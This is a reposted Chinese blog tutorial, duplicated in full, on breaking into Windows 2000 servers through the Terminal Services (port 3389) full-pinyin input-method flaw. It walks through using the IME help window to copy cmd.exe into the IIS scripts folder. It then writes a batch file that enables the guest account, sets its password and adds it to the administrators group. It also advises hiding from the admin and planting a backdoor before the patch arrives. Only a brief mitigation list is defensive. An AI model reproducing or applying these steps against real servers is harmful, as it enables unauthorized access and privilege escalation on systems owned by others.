3389埠的入侵,Win Server2000 全拼輸入法漏洞(轉)
由於微軟對中國產品不付責任的態度,使得安裝了終端服務和全拼的w2k 伺服器存在著遠端登陸並能獲取超級使用者許可權的嚴重漏洞。
其過程如下:
1.掃描 3389 port 終端服務預設;
2.用終端客戶端程式進行連線;
3.按ctrl+shift調出全拼輸入法(其他似乎不行),點滑鼠右鍵(如果其幫助選單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
4.在"選項"選單上點右鍵--->跳轉到URL",輸入:c:\winnt\system32\cmd.exe.(如果不能確定NT系統目錄,則輸入:c:\ 或d:\
……進行查詢確定);
5.選擇"儲存到磁碟" 選擇目錄:c:\inetpub\scripts\,因實際上是對方伺服器上檔案自身的複製操作,所以這個過程很快就會完成;
6.開啟IE,輸入 dir 怎麼樣?有cmd.exe檔案了吧?這我們就完成了第一步;
7 echo net user guest /active:yes>go.bat
8 echo net user guest elise>>go.bat
9 echo net localgroup administrators /add
guest>>go.bat
10 type go.bat 看看我們的批檔案內容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"選單上點右鍵--->跳轉到URL",輸入:c:\inetpub\scripts\go.bat --->在磁碟當前位置執行;
12. 呵呵,大功告成啦,這樣我們就啟用了伺服器的geust帳戶,密碼為:elise,超級使用者呢!(我喜歡guest而不是建立新帳戶,這樣似乎不易被發現 些),這樣你就可用IPC$連線,想怎樣做就怎樣做了,當然,你也可用guest直接登陸到他的伺服器,到他機器上去跳舞吧:-)
注意事項:
1.當你用終端客戶端程式登陸到他的伺服器時,你的所有操作不會在他的機器上反應出來,但如果他正開啟了終端服務管理器,你就慘了了:(這時他能看到你所開啟的程式id、程式映象,你的ip及機器名,並能發訊息給你!
2.當你連線時,會加重對方伺服器的負荷,非常容易造成對方當機和斷線,所以你的操作快點為妙。
3.儘快做好後門,暫時不要上傳任何程式,一是防止斷線,二是防止對方打上補丁!
個人觀點:
1.在IE下,所擁有的只是iusr_machine許可權,因而,你不要設想去做越權的事情,如啟動telnet、木馬等;
2.url的跳轉下,你將擁有超級使用者的許可權,好好利用吧
3.跳轉到哪個目錄下,通常只能檢視、執行當前目錄的檔案,不能進入到子目錄,如想進入,再跳一次吧!:)
4.此法似乎與對方的防火牆無關哦!
5.據本人實際操作,發現極易斷線,但應與佔用伺服器資源無關。對方是384M RAM+PIII,是靜態IP,主要是做資料庫伺服器,RAID硬碟,SCSI CD
ROM,開機18天了,02:00進去時,仍時常吊線。
堵漏辦法:
1.打補丁;
2.刪掉全拼輸入法,用標準就成了嘛^_^;
3.服務中關掉:Terminal Services,服務名稱:TermService,對應程式名:system32\termsrv.exe;
其過程如下:
1.掃描 3389 port 終端服務預設;
2.用終端客戶端程式進行連線;
3.按ctrl+shift調出全拼輸入法(其他似乎不行),點滑鼠右鍵(如果其幫助選單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
4.在"選項"選單上點右鍵--->跳轉到URL",輸入:c:\winnt\system32\cmd.exe.(如果不能確定NT系統目錄,則輸入:c:\ 或d:\
……進行查詢確定);
5.選擇"儲存到磁碟" 選擇目錄:c:\inetpub\scripts\,因實際上是對方伺服器上檔案自身的複製操作,所以這個過程很快就會完成;
6.開啟IE,輸入 dir 怎麼樣?有cmd.exe檔案了吧?這我們就完成了第一步;
7 echo net user guest /active:yes>go.bat
8 echo net user guest elise>>go.bat
9 echo net localgroup administrators /add
guest>>go.bat
10 type go.bat 看看我們的批檔案內容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"選單上點右鍵--->跳轉到URL",輸入:c:\inetpub\scripts\go.bat --->在磁碟當前位置執行;
12. 呵呵,大功告成啦,這樣我們就啟用了伺服器的geust帳戶,密碼為:elise,超級使用者呢!(我喜歡guest而不是建立新帳戶,這樣似乎不易被發現 些),這樣你就可用IPC$連線,想怎樣做就怎樣做了,當然,你也可用guest直接登陸到他的伺服器,到他機器上去跳舞吧:-)
注意事項:
1.當你用終端客戶端程式登陸到他的伺服器時,你的所有操作不會在他的機器上反應出來,但如果他正開啟了終端服務管理器,你就慘了了:(這時他能看到你所開啟的程式id、程式映象,你的ip及機器名,並能發訊息給你!
2.當你連線時,會加重對方伺服器的負荷,非常容易造成對方當機和斷線,所以你的操作快點為妙。
3.儘快做好後門,暫時不要上傳任何程式,一是防止斷線,二是防止對方打上補丁!
個人觀點:
1.在IE下,所擁有的只是iusr_machine許可權,因而,你不要設想去做越權的事情,如啟動telnet、木馬等;
2.url的跳轉下,你將擁有超級使用者的許可權,好好利用吧
3.跳轉到哪個目錄下,通常只能檢視、執行當前目錄的檔案,不能進入到子目錄,如想進入,再跳一次吧!:)
4.此法似乎與對方的防火牆無關哦!
5.據本人實際操作,發現極易斷線,但應與佔用伺服器資源無關。對方是384M RAM+PIII,是靜態IP,主要是做資料庫伺服器,RAID硬碟,SCSI CD
ROM,開機18天了,02:00進去時,仍時常吊線。
堵漏辦法:
1.打補丁;
2.刪掉全拼輸入法,用標準就成了嘛^_^;
3.服務中關掉:Terminal Services,服務名稱:TermService,對應程式名:system32\termsrv.exe;
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/11411056/viewspace-734408/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 利用135埠漏洞入侵個人電腦(轉)
- 【轉】21和80埠的入侵
- win10增加輸入法的方法_win10輸入法如何新增Win10
- win10 如何更改輸入法 win10 如何更改輸入法Win10
- 駭客經驗談系列之入侵3389起源完整編(轉)
- Win10輸入法設定方法_win 10 輸入法如何設定Win10
- win10怎麼新增新的輸入法_如何在win10新增輸入法Win10
- win10輸入法特殊字元怎麼輸入_win10微軟輸入法輸入特殊符號操作方法Win10字元微軟符號
- win10預設輸入法怎麼刪除輸入法 win10預設輸入法如何刪除Win10
- imemode 控制輸入法,控制輸入框的輸入法
- win10怎樣設定輸入法_win10設定輸入法的步驟Win10
- win10刪除輸入法在哪裡 win10刪除多餘的輸入法Win10
- win10系統輸入法失效打不了字怎麼回事_win10輸入法失效無法輸入的解決方法Win10
- 【轉】1433埠入侵詳解
- 入侵攻擊實戰中被利用的埠(轉)
- win10輸入法切換方法_win10輸入法怎麼切換Win10
- win10怎麼裝英文輸入法_win10新增英文輸入法教程Win10
- Win10電腦搜狗輸入法無法輸入中文及輸入法欄不見了的解決方法Win10
- win10如何刪除微軟輸入法 win10刪除微軟輸入法的步驟Win10微軟
- 如何刪除win10微軟輸入法 win10解除安裝微軟輸入法的方法Win10微軟
- win10如何修改輸入法 win10 更改輸入法方法Win10
- win10輸入法遮蔽如何恢復_win10遮蔽輸入法處理方法Win10
- win10輸入法怎麼解除安裝_win10輸入法如何刪除Win10
- win10輸入法如何設定成win7_win10輸入法切換成win7的步驟Win10Win7
- 修改windows遠端桌面3389埠Windows
- win10輸入法只能輸入英文如何處理_win10輸入法失效只能打英文解決方法Win10
- win10電腦怎麼刪除輸入法_win10刪除輸入法的步驟Win10
- win10搜狗輸入法怎麼新增日語_win10新增日語輸入法的方法Win10
- win10鍵盤無法輸入任何東西 win10鍵盤無法輸入的方法Win10
- 怎麼把win10輸入法改成win7_win10輸入法改成win7模式如何操作Win10Win7模式
- win10怎麼關輸入法快捷鍵 win10如何取消輸入法快捷鍵Win10
- win10輸入法哪個好用_win10系統用什麼輸入法好Win10
- win10修改輸入法切換方式 win10修改輸入法切換快捷鍵Win10
- win10輸入法不見了怎麼辦 win10輸入法欄消失了Win10
- windows10輸入法怎麼設定_win10輸入法設定的方法WindowsWin10
- 預設輸入法怎麼設定win10_win10系統修改預設輸入法的教程Win10
- win10輸入法鎖定怎麼設定_win10輸入法鎖定的具體方法Win10
- win10輸入法不見了怎麼找回 win10輸入法不見了找回的方法Win10